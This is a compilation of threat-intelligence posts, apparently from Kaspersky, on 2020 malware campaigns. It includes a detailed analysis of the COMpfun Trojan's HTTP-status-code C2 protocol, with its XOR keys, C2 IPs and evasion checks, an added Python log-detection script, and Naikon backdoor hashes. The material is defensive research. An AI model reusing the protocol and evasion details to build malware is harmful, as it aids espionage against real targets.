  • Bitscout is completely FREE, thereby reducing your forensics budget.
  • It is designed to work remotely, saving time and money that would otherwise be spent on travel. Of course, you can use the same techniques locally.
  • The true value lies not in the toolkit itself, but in the power of all the forensic tools that are included.
  • There’s a steep learning curve involved in mastering Bitscout, which ultimately reinforces the technical foundations of your experts.
  • Bitscout records remote forensics sessions internally, making it perfect for replaying and learning from more experienced practitioners or using as evidential proof of discovery.
  • It is fully open source, so you don’t need to wait for the vendor to implement a patch or feature for you: you are free to reverse-engineer and modify any part of it.

We have launched a project website, bitscout-forensics.info, as the go-to destination for those looking for tips and tricks on remote forensics using Bitscout.

Hunting APTs with YARA

In recent years, we have shared our knowledge and experience of using YARA as a threat hunting tool, mainly through our training course, ‘Hunting APTs with YARA like a GReAT ninja’, delivered during our Security Analyst Summit. However, the COVID-19 pandemic has forced us to postpone the forthcoming SAS.

Meanwhile, we have received many requests to make our YARA hands-on training available to more people. This is something we are working on and hope to be able to provide soon as an online training experience. Look out for updates on this by following us on Twitter – @craiu, @kaspersky.

With so many people working from home, and spending even more time online, it is also likely the number of threats and attacks will increase. Therefore, we decided to share some of the YARA experience we have accumulated in recent years, in the hope that all of you will find it useful for keeping threats at bay.

If you weren’t able to join the live presentation, on March 31, you can find the recording here.

We track the activities of hundreds of APT threat actors and regularly highlight the more interesting findings here. However, if you want to know more, please reach out to us at intelreports@kaspersky.com.

Other security news

Shlayer Trojan attacks macOS users

Although many people consider macOS to be safe, there are cybercriminals who seek to exploit those who use this operating system. One malicious program stands out – the Shlayer Trojan. In 2019, Kaspersky macOS products blocked this Trojan on every tenth device, making this the most widespread threat to people who use macOS.

Shlayer is a smart malware distribution system that spreads via a partner network, entertainment websites and even Wikipedia. This Trojan specializes in the installation of adware – programs that feed victims illicit ads, intercepting and gathering their browser queries and modifying search results to distribute even more advertising messages.

Shlayer accounted for almost one-third of all attacks on macOS devices registered by Kaspersky products between January and November last year – and nearly all other top 10 macOS threats were adware programs that Shlayer installs.

The infection starts with an unwitting victim downloading the malicious program. The criminals behind Shlayer set up a malware distribution system with a number of channels leading their victims to download the malware. Shlayer is offered as a way to monetize websites in a number of file partner programs, with relatively high payment for each malware installation made by users in the US, prompting over 1,000 ‘partner sites’ to distribute Shlayer. This scheme works as follows: a user looks for a TV series episode or a football match, and advertising landing pages redirect them to fake Flash Player update pages. From here, the victim downloads the malware; and for each installation, the partner who distributed links to the malware receives a pay-per-install payment.

Other schemes that we saw led to a fake Adobe Flash update page that redirected victims from various large online services with multi-million audiences, including YouTube, where links to the malicious website were included in video descriptions, and Wikipedia, where such links were hidden in article references. People who clicked on these links would also be redirected to the Shlayer download landing pages. Kaspersky researchers found 700 domains containing malicious content, with links to them on a variety of legitimate websites.

Almost all the websites that led to a fake Flash Player contained content in English. This corresponds to the countries where we have seen most infections – the US (31%), Germany (14%), France (10%) and the UK (10%).

Blast from the past

Although many people still use the term “virus” to mean any malicious program, it actually refers specifically to self-replicating code, i.e., malicious code that copies itself from file to file on the same computer. Viruses, which used to dominate the threat landscape, are now rare. However, there are some interesting exceptions to this trend and we came across one recently – the first real virus we’ve seen in the wild for some time.

The virus, called KBOT, infects the victim’s computer via the internet, a local network, or infected external media. After the infected file is launched, the malware gains a foothold in the system, writing itself to Startup and the Task Scheduler, and then deploys web injects to try to steal the victim’s bank and personal data. KBOT can also download additional stealer modules that harvest and send to the Command-and-Control (C2) server comprehensive information about the victim, including passwords/logins, crypto-wallet data, lists of files and installed applications, and so on. The malware stores all its files and stolen data in a virtual file system, encrypted using the RC6 algorithm, making it hard to detect.

Cybercriminals exploiting fears about data breaches

Phishers are always on the lookout for hot topics that they can use to hook their victims, including sport, politics, romance, shopping, banking, natural disasters and anything else that might entice someone into clicking on a link or malicious file attachment.

Recently, cybercriminals have exploited the theme of data leaks to try to defraud people. Data breaches, and the fines imposed for failing to safeguard data, are now a staple feature of the news. The scammers posed as an organization called the “Personal Data Protection Fund” and claimed that the “US Trading Commission” had set up a fund to compensate people whose personal data had been exposed.

However, in order to get the compensation, the victims are asked to provide a social security number. The scammers offer to sell a temporary SSN to those who don’t have one.

Even if the potential victim enters a valid SSN, they are still directed to a page asking them to purchase a temporary SSN.

You can read the full story here.

… and coronavirus

The bigger the hook, the bigger the pool of potential victims. So it’s no surprise that cybercriminals are exploiting the COVID-19 pandemic. We have found malicious PDF, MP4 and DOCX files disguised as information about the coronavirus. The names of the files suggest they contain video instructions on how to protect yourself, updates on the threat and even virus detection procedures. In fact, these files are capable of destroying, blocking, modifying or copying data, as well as interfering with the operation of the computer.

The cybercriminals behind the Ginp banking Trojan recently developed a new campaign related to COVID-19. After receiving a special command, the Trojan opens a web page called Coronavirus Finder. This provides a simple interface that claims to show the number of people nearby who are infected with the virus and asks you to pay a small sum to see their location.

The Trojan then provides a payment form.

Then … nothing else happens – apart from the criminals taking your money. Data from the Kaspersky Security Network suggests that most users who have encountered Ginp are located in Spain. However, this is a new version of Ginp that is tagged “flash-2”, while previous versions were tagged “flash-es12”. So perhaps the lack of “es” in the tag of the newer version means the cybercriminals are planning to expand their campaign beyond Spain.

We have also seen a number of phishing scams where cybercriminals pose as bona fide organizations to trick people into clicking on links to fake sites where the scammers capture their personal information, or even ask them to donate money.

If you’ve ever wanted to know why it’s so easy for phishers to create spoof emails, and what efforts have been made to make it harder for them, you can find a good overview of the problems and potential solutions here.

Cybercriminals are also taking the opportunity to attack the information infrastructure of medical facilities, clearly hoping that the overload on IT services will provide them with an opportunity to break into hospital networks, or are attempting to extort money from clinical research companies. In an effort to ensure that IT security isn’t something that medical teams have to worry about, we’re offering medical institutions free six-month licenses for our core solutions.

AZORult campaign abuses popular VPN service to steal crypto-currency

In February, we reported an unusual malware campaign in which cybercriminals were spreading the AZORult Trojan as a fake installer for ProtonVPN.

The aim of the campaign is to steal personal information and crypto-currency from the victims.

The attackers created a spoof copy of a VPN service’s website, which looks like the original but has a different domain name. The criminals spread links to the domain through advertisements using different banner networks – a practice known as malvertising. When someone visits the phishing website, they are prompted to download a free VPN installer for Windows. Once launched, this drops a copy of the AZORult botnet implant, which collects information about the infected device’s environment and reports it to the server. Finally, the attackers steal crypto-currency from locally available wallets (Electrum, Bitcoin, Ethereum and others), FTP logins and passwords from FileZilla, email credentials, information from locally installed browsers (including cookies), and credentials from WinSCP, Pidgin messenger and others.

AZORult is one of the most commonly bought and sold stealers on Russian forums due to its wide range of capabilities. The Trojan is able to harvest a good deal of data, including browser history, login credentials, cookies, files and crypto-wallet files; and can also be used as a loader to download other malware.

Distributing malware under the guise of security certificates

Distributing malware under the guise of legitimate software updates is not new. Typically, cybercriminals invite potential victims to install a new version of a browser or Adobe Flash Player. However, we recently discovered a new approach: visitors to infected sites were informed that some kind of security certificate had expired.

They were offered an update that infected them with malware – specifically the Buerak downloader and Mokes backdoor.

We detected the infection on variously themed websites – from a zoo to a store selling auto parts. The earliest infections that we found date back to January 16.

Mobile malware sending offensive messages

We have seen many mobile malware apps re-invent themselves, adding new layers of functionality over time. The Faketoken Trojan offers a good example of this. Over the last six years, it has developed from an app designed to capture one-time passcodes, to a fully-fledged mobile banking Trojan, to ransomware. By 2017, Faketoken was able to mimic many different apps, including mobile banking apps, e-wallets, taxi service apps and apps used to pay fines and penalties – all in order to steal bank account data.

Recently, we observed 5,000 Android smartphones infected by Faketoken sending offensive text messages. SMS capability is a standard feature of many mobile malware apps, many of which spread by sending links to their victims’ contacts; and banking Trojans typically try to make themselves the default SMS application, in order to intercept one-time passcodes. However, we had not seen one become a mass texting tool.

The messages sent by Faketoken are charged to the owner of the device; and since many of the infected smartphones we saw were texting a foreign number, the cost was quite high. Before sending any messages, the Trojan checks to see if there are sufficient funds in the victim’s bank account. If there are, Faketoken tops up the mobile account before sending any messages.

We don’t yet know whether this is a one-off campaign or the start of a trend. To avoid becoming a victim of Faketoken, download apps only from Google Play, disable the downloading of apps from other sources, don’t follow links from messages and protect your device with a reputable mobile security product.

The use and abuse of the Android AccessibilityService

In January, we reported that cybercriminals were using malware to boost the rating of specific apps, to increase the number of installations.

The Shopper.a Trojan also displays advertising messages on infected devices, creates shortcuts to advertising sites and more.

The Trojan opens Google Play (or other app store), installs several programs and writes fake user reviews about them. To prevent the victim noticing, the Trojan conceals the installation window behind an ‘invisible’ window. Shopper.a gives itself the necessary permissions using the Android AccessibilityService. This service is intended to help people with disabilities use a smartphone, but if a malicious app obtains permission to use it, the malware has almost limitless possibilities for interacting with the system interface and apps – including intercepting data displayed on the screen, clicking buttons and emulating user gestures.

Shopper.a was most widespread in Russia, Brazil and India.

You should be wary if an app requests access to the AccessibilityService but doesn’t need it. Even if the only danger posed by such apps comes from automatically written reviews, there is no guarantee that their creators will not change the payload later.

Everyone loves cookies – including cybercriminals

We recently discovered a new malicious Android Trojan, dubbed Cookiethief, designed to acquire root permissions on the victim’s device and transfer cookies used by the browser and the Facebook app to the cybercriminals’ C2 server. Using the stolen cookies, the criminals can gain access to the unique session IDs that websites and online services use to identify someone, thereby allowing the criminals to assume someone’s identity and gain access to online accounts without the need for a login and password.

On the C2 server, we found a page advertising services for distributing spam on social networks and messengers, which we think is the underlying motive in stealing cookies.

From the C2 server addresses and encryption keys used, we were able to link Cookiethief to widespread Trojans such as Sivu, Triada, and Ztorg. Usually, such malware is either planted in the device firmware before purchase, or it gets into system folders through vulnerabilities in the operating system and then downloads various applications onto the system.

Stalkerware: no place to hide

We recently discovered a new sample of stalkerware – commercial software typically used by those who want to monitor a partner, colleague or others – that contains functionality beyond anything we have seen before. You can find more information on stalkerware here and here.

MonitorMinor goes beyond other stalkerware programs. Primitive stalkerware uses geo-fencing technology, enabling the operator to track the victim’s location, and in most cases intercept SMS and call data. MonitorMinor goes a few steps further: recognizing the importance of messengers as a means of data collection, this app aims to get access to data from all the popular modern communication tools.

Normally, the Android sandbox prevents direct communication between apps. However, if a superuser app has been installed, which grants root access to the system, it overrides the security mechanisms of the device. The developers of MonitorMinor use this to enable full access to data on a variety of popular social media and messaging applications, including Hangouts, Instagram, Skype and Snapchat. They also use root privileges to access screen unlock patterns, enabling the stalkerware operator to unlock the device when it is nearby or when they next have physical access to the device. Kaspersky has not previously seen this feature in any other mobile threat.

Even without root access, the stalkerware can operate effectively by abusing the AccessibilityService API, which is designed to make devices friendly for users with disabilities. Using this API, the stalkerware is able to intercept any events in the applications and broadcast live audio.

Our telemetry indicates that the countries with the largest share of installations of MonitorMinor are India, Mexico, Germany, Saudi Arabia and the UK.

We recommend the following tips to reduce the risk of falling victim to a stalker:

  • Block the installation of apps from unknown sources in your smartphone settings.
  • Never disclose the password or passcode to your mobile device, even with someone you trust.
  • If you are ending a relationship, change security settings on your mobile device, such as passwords and app location access settings.
  • Keep a check on the apps installed on your device, to see if any suspicious apps have been installed without your consent.
  • Use a reliable security solution that notifies you about the presence of commercial spyware programs aimed at invading your privacy, such as Kaspersky Internet Security.
  • If you think you are being stalked, reach out to a professional organization for advice.
  • For further guidance, contact the Coalition against Stalkerware.
  • There are resources that can assist victims of domestic violence, dating violence, stalking and sexual violence. If you need further help, please contact the Coalition against Stalkerware.

May 19, 2020

Verizon’s 2020 DBIR

Verizon’s 2020 DBIR is out; you can download a copy or peruse their publication online. Kaspersky was a contributor once again, and we are happy to provide generalized incident data from our unique and objective research.

We have contributed to this project and others like it for years now. This year’s ~120 page report analyses data from us and 80 other contributors from all over the world. The team provides thoughts on a mountain of breach data – “This year, we analyzed a record total of 157,525 incidents. Of those, 32,002 met our quality standards and 3,950 were confirmed data breaches”. And this year, Verizon pulled in far more data on cybercrime breaches. We include a few interesting notes here:

  • 70% of reported breaches were perpetrated by external actors
  • a majority of breaches do not just involve a dropped trojan
  • 86% of breaches were financially motivated
  • 81% of breaches were contained in days or less
  • defenders are up against organized crime
  • almost a third of reported breaches involved ransomware

May 14, 2020

Cyberthreats on lockdown

Every year, our anti-malware research team releases a series of reports on various cyberthreats: financial malware, web attacks, exploits, etc. As we monitor the increase, or decrease, in the number of certain threats, we do not usually associate these changes with concurrent world events – unless these events have a direct relation to the cyberthreats, that is: for example, the closure of a large botnet and arrest of its owners result in a decrease in web attacks.

However, the COVID-19 pandemic has affected us all in some way, so it would be surprising if cybercriminals were an exception. Spammers and phishers were naturally the trailblazers in this – look for details in the next quarterly report – but the entire cybercrime landscape has changed in the last few months. Before we discuss the subject, let us get something out of the way: it would be farfetched to attribute all of the changes mentioned below to the pandemic. However, certain connections can be traced.

Remote work

The first thing that caught our attention was remote work. From an information security standpoint, an employee within the office network and an employee connecting to the same network from home are two completely different users. It seems cybercriminals share this view, as the number of attacks on servers and remote access tools has increased as their usage has grown. In particular, the average daily number of bruteforce attacks on database servers in April 2020 was up by 23% from January.

Distribution of botnet C&C servers by country, Q1 2020

Unique computers subjected to bruteforce attacks, January through April 2020

Cybercriminals use brute force to penetrate a company’s network and subsequently launch malware inside its infrastructure. We are monitoring several cybercrime groups that rely on the scheme. The payload is usually ransomware, mostly from the Trojan-Ransom.Win32.Crusis, Trojan-Ransom.Win32.Phobos and Trojan-Ransom.Win32.Cryakl families.

RDP-attacks and ways to counter these were recently covered in detail by Dmitry Galov in his blog post, “Remote spring: the rise of RDP bruteforce attacks“.

Remote entertainment

Online entertainment activity increased as users transitioned to a “remote” lifestyle. The increase was so pronounced that some video streaming services, such as YouTube, announced that they were changing their default video quality to help with reducing traffic. The cybercriminal world responded by stepping up web threats: the average daily number of attacks blocked by Kaspersky Web Anti-Virus increased by 25% from January 2020.

Web-based attacks blocked, January through April 2020

It is hard to single out one specific web threat as the driver – all of the threats grew more or less proportionally. Most web attacks that were blocked originated with resources that redirected users to all kinds of malicious websites. Some of these were phishing resources and websites that subscribed visitors to unsolicited push notifications or tried to scare them with fake system error warnings.
We also noticed an increase in Trojan-PSW browser script modifications that could be found on various infected sites. Their main task was to capture bank card credentials entered by users while shopping online and transfer these to cybercriminals.
Websites capable of silently installing cookie files on users’ computers (cookie stuffing) and resources that injected advertising scripts into users’ traffic together accounted for a significant share of the web threats.

14 May 2020

COMpfun authors spoof visa application with HTTP status-based Trojan

You may remember that in autumn 2019 we published a story about how a COMpfun successor known as Reductor infected files on the fly to compromise TLS traffic. If you’re wondering whether the actor behind the malware is still developing new features, the answer is yes. Later in November 2019 our Attribution Engine revealed a new Trojan with strong code similarities. Further research showed that it was obviously using the same code base as COMPFun.

What’s of interest inside

The campaign operators retained their focus on diplomatic entities, this time in Europe, and spread the initial dropper as a spoofed visa application. It is not clear to us exactly how the malicious code is being delivered to a target. The legitimate application was kept encrypted inside the dropper, along with the 32- and 64-bit next stage malware.

Overall infection chain. Interestingly, C2 commands are rare HTTP status codes

We observed an interesting C2 communication protocol utilizing rare HTTP/HTTPS status codes (check IETF RFC 7231, 6585, 4918). Several HTTP status codes (422-429) from the Client Error class let the Trojan know what the operators want to do. After the control server sends the status “Payment Required” (402), all these previously received commands are executed.

The authors keep the RSA public key and unique HTTP ETag in encrypted configuration data. Created for web content caching reasons, this marker could also be used to filter unwanted requests to the C2, e.g., those that are from network scanners rather than targets. Besides the aforementioned RSA public key to communicate with the C2, the malware also uses a self-generated AES-128 key.

Who is the author?

We should mention here once again that the COMPfun malware was initially documented by G DATA in 2014, although the company did not identify which APT was using it. Based mostly on victimology, we were able to associate it with the Turla APT with a medium-to-low level of confidence.

What the Trojan is able to do

Its functions include the ability to acquire the target’s geolocation, gathering host- and network-related data, keylogging and screenshots. In other words, it’s a normal full-fledged Trojan that is also capable of propagating itself to removable devices.

As in previous malware from the same authors, all the necessary function addresses resolve dynamically to complicate analysis. To exfiltrate the target’s data to the C2 over HTTP/HTTPS, the malware uses RSA encryption. To hide data locally, the Trojan implements LZNT1 compression and one-byte XOR encryption.

Encrypted data | Algorithm | Key source
Exfiltrated keystrokes, screenshots, etc. | RSA | Public key from configuration data
Configuration data in .rsrc section | XOR (plus LZNT1 compression) | Hardcoded one-byte key
Parameters inside the HTTP GET/POST requests | AES-128 (plus ETag from config) | Generated by Trojan and shared in beacon
Commands and arguments from C2 for HTTP status 427 (dir, upl, usb, net) | AES-128 | Generated by Trojan and shared in beacon

Encryption and compression used by the Trojan for various tasks

Initial dropper

The first stage dropper was downloaded from the LAN shared directory. The file name related to the visa application process perfectly corresponds with the targeted diplomatic entities. As with all modules with a similar code base, the dropper begins by dynamically resolving all the required Windows API function addresses and puts them into structures. It then decrypts the next stage malware from its resource (.rsrc) section. The algorithm used to decrypt the next stage is a one-byte XOR using the key “0x55”, followed by LZNT1 decompression.

The following files are dropped to the disk in addition to the original application that the malware tries to mimic:

MD5 hash | File name | Features
1BB03CBAD293CA9EE3DDCE6F054FC325 | ieframe.dll.mui | 64-bit Trojan version
A6AFA05CBD04E9AF256D278E5B5AD050 | ExplorerFrame.dll.mui | 32-bit Trojan version

The dropper urges users to run the file as administrator (using messages such as “need to run as admin”), then drops a version corresponding to the host’s architecture and sets the file system timestamp to 2013.12.20 22:31.

Interestingly, the dropper’s abilities aren’t limited to PE lures; as an alternative, this stage is also able to use .doc and .pdf files. In such cases, the dropper will open the files using the “open” shell command instead of running the legitimate spoofed executable application.

Main module – HTTP status-based Trojan

SHA256: 710b0fafe5fd7b3d817cf5c22002e46e2a22470cf3894eb619f805d43759b5a3
MD5: a6afa05cbd04e9af256d278e5b5ad050
Compiled: 2015.06.26 09:42:27 (GMT)
Type: I386 Windows GUI DLL
Size: 593408
Internal name: ExplorerFrame.dll.mui

The analysis below is based on the 32-bit sample from the table above. The legitimate ExplorerFrame.dll.mui is a language resource for the ExplorerFrame.dll file used by Windows Explorer.

Multi-threaded Trojan features such as monitoring USB devices to spread further and receiving commands as HTTP status codes

Initialization

As usual in this malware family’s code, a huge number of short standalone functions return all the readable strings. This is done to complicate analysis by not allowing the strings to be visible at a glance for researchers. The module’s preparation stage dynamically resolves all required Windows API function addresses into corresponding custom structures. Afterwards the malware uses indirect function calls only.

The module obtains the processor architecture (32- or 64-bit) and Windows OS version. It includes a number of anti-analysis checks for virtual machine-related devices (VEN_VMWARE, VBOX_HARDDISK, Virtual_DVD_ROM, etc.) to avoid controlled execution. It also notes which security products are running on the host (Symantec, Kaspersky, Dr.Web, Avast).

Before every communication with the C2, the malware checks if software such as debuggers (WinDbg, OllyDbg, Visual Studio) and host (Process Explorer or Monitor, etc.) or network monitoring (Wireshark, TCPView, etc.) programs are running. It also checks for internet connectivity and does not attempt to communicate if the checks fail.

The DLL also checks for potentially available launch processes that it can inject itself into. In the case of PaymentRequired, this could be system, security product or browser processes. Then the malware forms the corresponding code to drop files, delete files, etc.

The last step in the initialization procedure is to decrypt and decompress the configuration file. Decryption is done via a one-byte XOR using the 0xAA key, followed by decompression using the LZNT1 algorithm. From the configuration, the malware parses the RSA public key, ETag and IP addresses to communicate with its control servers.

Decrypted configuration data contains an RSA public key to encrypt exfiltrated data, C2 IPs and unique ETag to communicate with them

HTTP status-based communication module

Firstly, the module generates the following:

  • AES-128 encryption key used in HTTP GET/POST parameters and HTTP status code 427 (request new command);
  • 4-byte unique hardware ID (HWID) based on the host network adapters, CPU and first fixed logical drive serial number.

The module then chooses a process to inject the code into, in order of decreasing priority, starting from Windows (cmd.exe, smss.exe), security-related applications (Symantec’s nis.exe, Dr.Web’s spideragent.exe) and browsers (IE, Opera, Firefox, Yandex browser, Chrome).

The main thread checks if the C2 supports TLS in its configuration. If it does, communication will be over HTTPS and port 443; otherwise, the HTTP protocol and port 80 are used.

Config parameter | Value
Encryption key | RSA public key on the image above
ETag | C8E9CEAD2E084F58A94AEDC14D423E1A
C2 IPs | 95.183.49[.]10, 95.183.49[.]29, 200.63.45[.]35

Decrypted configuration content inside the analyzed sample

The first GET request sent contains an ETag “If-Match” header that is built using data from its decrypted configuration. ETags are normally used by web servers for caching purposes in order to be more efficient and save bandwidth by not resending redundant information if an ETag value matches. The implementation of ETags means the C2 may ignore all requests that are not sent from its intended targets if they don’t have the required ETag value.

HTTP status | RFC status meaning | Corresponding command functionality
200 | OK | Send collected target data to C2 with current tickcount
402 | Payment Required | This status is the signal to process the received (and stored in a binary flag) HTTP statuses as commands
422 | Unprocessable Entity (WebDAV) | Uninstall. Delete COM-hijacking persistence and corresponding files on disk
423 | Locked (WebDAV) | Install. Create COM-hijacking persistence and drop corresponding files to disk
424 | Failed Dependency (WebDAV) | Fingerprint target. Send host, network and geolocation data
427 | Undefined HTTP status | Get new command into IEA94E3.tmp file in %TEMP%, decrypt and execute appended command
428 | Precondition Required | Propagate self to USB devices on target
429 | Too Many Requests | Enumerate network resources on target

C2 HTTP status code descriptions, including installation, USB propagation, fingerprinting, etc.
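As an added example (not code from the original post), the command-then-trigger pattern in the table above can be turned into a proxy-log check from the defender's side: a client that receives several 422-429 responses from one server and then a 402 matches the Trojan's behaviour, and a 427 is not assigned by any RFC at all. The log format, hosts and ETag value below are constructed for the example.

```python
"""Flag COMpfun-style HTTP status-code C2 exchanges in proxy logs.

Added example, not part of the original post. The log format is constructed:
one record per line, whitespace-separated fields
  timestamp client server method status if_match   ('-' when no If-Match header)
"""
from collections import defaultdict
from dataclasses import dataclass, field

# Statuses the Trojan queues as commands, and the trigger that executes them (from the post).
COMMAND_STATUSES = {422, 423, 424, 427, 428, 429}
TRIGGER_STATUS = 402          # "Payment Required": run everything queued so far
UNDEFINED_STATUS = 427        # not defined by any RFC; never produced by a benign server


@dataclass
class PeerState:
    """Per (client, server) state mirroring the Trojan's 'binary flag' of queued commands."""
    queued: list = field(default_factory=list)
    if_match_seen: bool = False


def parse_line(line):
    """Split one constructed log record into (ts, client, server, method, status, if_match)."""
    ts, client, server, method, status, if_match = line.split(maxsplit=5)
    return ts, client, server, method, int(status), None if if_match == "-" else if_match


def analyze(lines):
    """Return alerts as (timestamp, client, server, reason) tuples."""
    states = defaultdict(PeerState)
    alerts = []
    for line in lines:
        ts, client, server, method, status, if_match = parse_line(line)
        st = states[(client, server)]
        if if_match is not None:
            st.if_match_seen = True     # beacon carried an ETag, as described in the post
        if status == UNDEFINED_STATUS:
            alerts.append((ts, client, server, "undefined HTTP status 427"))
        if status in COMMAND_STATUSES:
            st.queued.append(status)    # a single rare 4xx is only queued, not alerted
        elif status == TRIGGER_STATUS and st.queued:
            reason = f"402 after queued {sorted(st.queued)}"
            if st.if_match_seen:
                reason += " (If-Match ETag seen on earlier beacon)"
            alerts.append((ts, client, server, reason))
            st.queued.clear()
    return alerts


# Constructed sample: 10.0.0.5 talks to a C2 at 203.0.113.7; 10.0.0.9 is benign traffic.
SAMPLE_LOG = [
    '2020-05-14T10:00:01 10.0.0.5 203.0.113.7 GET 200 "EXAMPLE-ETAG"',
    '2020-05-14T10:00:31 10.0.0.5 203.0.113.7 GET 424 -',
    '2020-05-14T10:01:01 10.0.0.5 203.0.113.7 GET 428 -',
    '2020-05-14T10:01:31 10.0.0.5 203.0.113.7 GET 402 -',
    '2020-05-14T10:02:00 10.0.0.9 198.51.100.2 POST 429 -',   # ordinary rate limiting
    '2020-05-14T10:02:05 10.0.0.9 198.51.100.2 GET 200 -',
    '2020-05-14T10:03:00 10.0.0.5 203.0.113.7 GET 427 -',
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(*alert)
```

A lone 429 or 402 from a server is common on the open web, which is why the check only fires on the trigger following queued statuses, or on 427 outright.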

HTTP 427 can receive any of the following appended commands:

Command | Command functionality
dir | Send directory content to C2 encrypted with RSA public key from config
upl | Send file to C2 encrypted with RSA public key from config
usb | Not implemented yet. Possibly same function planned as for HTTP status 428
net | Not implemented yet. Possibly same function planned as for HTTP status 429

Removable device propagation module

If initialization is successful, the malware starts one more thread for dispatching Windows messages, looking for removable devices related to a WM_DEVICECHANGE event. The module runs its own handlers in the event of a USB device being plugged into or unplugged from the host.

Other spying modules: keylogger, screenshot tool and more

The user’s activity is monitored using several hooks. All of them gather the target’s data independently of any C2 command. Keystrokes are encrypted using the RSA public key stored in the configuration data and sent once every two seconds, or when more than 512 bytes are recorded. These 512 characters also include left mouse button clicks (written as the “MSLBTN” string) and window title bar texts. For clipboard content, the module calculates an MD5 hash and, if it changes, encrypts the clipboard content with the same RSA public key and then sends it.

In a separate thread, the Trojan takes a bitmap screenshot using the GDIPlus library, compresses it with the LZNT1 algorithm, encrypts it using the key from the configuration data and sends it to the control server. A screenshot will be taken of the target and sent anyway, independently of any C2 command.

Last but not least

There are several choices – albeit not major additional technical ones – that the malware author made which we consider to be noteworthy.

The COM-hijacking-based persistence method injects its corresponding code and structure as a parameter into a legitimate process’s memory. The malware geolocates victims using legitimate web services: geoplugin.net/json.gp, ip-api.com/json and telize.com/geoip.

The unusual thread synchronization timeout calculation in the HTTP status thread is peculiar. Mathematically, the partial sum of the series is precisely:

This series, when summed in full, is just the series expansion of the exponential function. The developers probably used the exponential to make timeouts in the communication thread more unpredictable and grow at a fast rate, and the compiler calculated it this way.

So what did the COMPFun authors achieve?

We saw innovative approaches from the COMpfun developers twice in 2019. First, they bypassed TLS encrypted traffic via PRNG system function patching, and then we observed a unique implementation of C2 communications using uncommon HTTP status codes.

The malware operators retained their focus on diplomatic entities and the choice of a visa-related application – stored on a directory shared within the local network – as the initial infection vector worked in their favor. The combination of a tailored approach to their targets and the ability to generate and execute their ideas certainly makes the developers behind COMPFun a strong offensive team.

Indicators of compromise

File MD5 Hashes
Trojan 32-bit: A6AFA05CBD04E9AF256D278E5B5AD050
Trojan 64-bit: 1BB03CBAD293CA9EE3DDCE6F054FC325

IPs
95.183.49.10
95.183.49.29
200.63.45.35

8 May 2020

Naikon’s Aria

Our colleagues at Checkpoint put together a fine research writeup on some Naikon resources and activity related to “aria-body” that we detected in 2017 and similarly reported in 2018. To supplement their research findings, we are summarizing and publishing portions of the findings reported in our June 2018 “Naikon’s New AR Backdoor Deployment to Southeast Asia”. This malware and activity aligns with much of what the Checkpoint researchers brought to light today.

The Naikon APT became well-known in May 2015, when our public reporting first mentioned and then fully described the group as a long-running presence in the APAC region. Even when the group shut down much of its successful offensive activity after years of campaigns, Naikon maintained several splinter campaigns. Matching malware artifacts, functionality, and targeting demonstrate that the group continued to wage cyber-espionage campaigns in the South China Sea region during 2018.

“Aria-Body” or “AR” is a set of backdoors with compilation dates between January 2017 and February 2018. It can be particularly difficult to detect, as much of this code operates in memory, injected by other loader components without touching disk. We trace portions of this codebase back to “xsFunction” exe and dll modules used in Naikon operations going back to 2012, as their compiled modules implement a subset of the xsFunction feature set. In all likelihood, this new backdoor and related activity is an extension of or merge with the group’s “Paradir Operation”. In the past, the group targeted communications and sensitive information from executive and legislative offices, law enforcement, government administrative, military and intelligence organizations within Southeast Asia. In many cases we have seen that these systems were also targeted previously with PlugX and other malware. So, the group has evolved a bit since 2015, and its activity targeting these same profiles continues into 2018. We identified at least a half dozen individual variants from 2017 and 2018.

Technical Details

It seems clear that the same codebase has been reused by Naikon since at least 2012, and recent AR backdoors were built from that same code. Their use was tightly clustered in previously and heavily Naikon-targeted organizations, again lending confidence to clustering these resources and activity with previous “Naikon”.


Naikon’s new AR backdoor is a dll loaded into any one of multiple processes, providing remote access to a system. AR load attempts have been identified within processes with executable images listed here:

  • c:\windows\system32\svchost.exe
  • c:\windows\syswow64\svchost.exe
  • c:\program files\windows nt\accessories\services.exe
  • c:\users\dell\appdata\roaming\microsoft\windows\start menu\programs\startup\acrobat.exe
  • c:\alphazawgyi\svchost.exe

Because this AR code is injected into processes, the yara rule provided in the Appendix is best run against memory dumps of processes maintaining a main image in the list above. The AR modules have additionally been seen in some others, including “msiexec.exe” processes.

Below are characteristics of the oldest AR and the newest known AR component in our collection.

MD5: c766e55c48a4b2e7f83bfb8b6004fc51
SHA256: 357c8825b3f03414582715681e4e0316859b17e702a6d2c8ea9eb0fd467620a4
CompiledOn: Tue Jan 3 09:23:48 2017
Type: PE32 DLL
Internal name: TCPx86.dll
Size: 176kb
Exports: AzManager, DebugAzManager

MD5: 2ce4d68a120d76e703298f27073e1682
SHA256: 4cab6bf0b63cea04c4a44af1cf25e214771c4220ed48fff5fca834efa117e5db
CompiledOn: Thu Feb 22 10:04:02 2018
Type: PE32 DLL
Internal name: aria-body-dllX86.dll
Size: 204kb
Exports: AzManager, DebugAzManager

When the dll is loaded, it registers a Windows class calling a specific Window procedure with a removable drive check, a CONNECT proxied callback to its main C2, an IP location verification against checkip.amazonaws[.]com, and further communications with a C2. Some previous modules’ flow may include more or less system information collection prior to the initial callback.

The most recent version of the backdoor utilizes another Window procedure to implement a raw input device based keystroke collector. This keylogger functionality was newly introduced to the malware code in February 2018, and was not present in previous versions.

The approximately 200 – 250kb AR backdoor family provides a familiar and slightly changing functionality set per compiled module. Because Checkpoint covers the same technical points in their post, we provide this simple summary list:

  • Persistence handling
  • File and directory handling
  • Keylogging
  • Shell/Process Management
  • Network activity and status listing and management
  • System information collection and management
  • Download management
  • Windows management
  • Extension management
  • Location/IP verification
  • Network Communications over HTTP

Similarities to past Naikon components

Naikon components going back to 2012 maintain heavy similarities with the current “Aria-body” modules. Not only is some of the functionality only lightly modified, but the same misspellings in error logging remain in their codebase. Let’s examine an older 2013 Naikon module and a newer 2017 Naikon AR module here.

It’s clear that the underlying codebase continues to be deployed:

e09254fa4398fccd607358b24b918b63, CompiledOn: 2013:09:10 09:00:15

c766e55c48a4b2e7f83bfb8b6004fc51, CompiledOn: 2017:01:03 09:23:48

Kudos to the Checkpoint researchers for providing new details of the Naikon story into the public discussion.

For reference, some hashes and a YARA rule are provided here. More incident, infrastructure, IOCs, and details have been and are available to our threat intel customers (please, contact intelreports@kaspersky.com).

Indicators of compromise

AR aria-body dll
c766e55c48a4b2e7f83bfb8b6004fc51
2ce4d68a120d76e703298f27073e1682

Loaders and related Naikon malware
0ed1fa2720cdab23d969e60035f05d92
3516960dd711b668783ada34286507b9

Verdicts – 2018 and Later
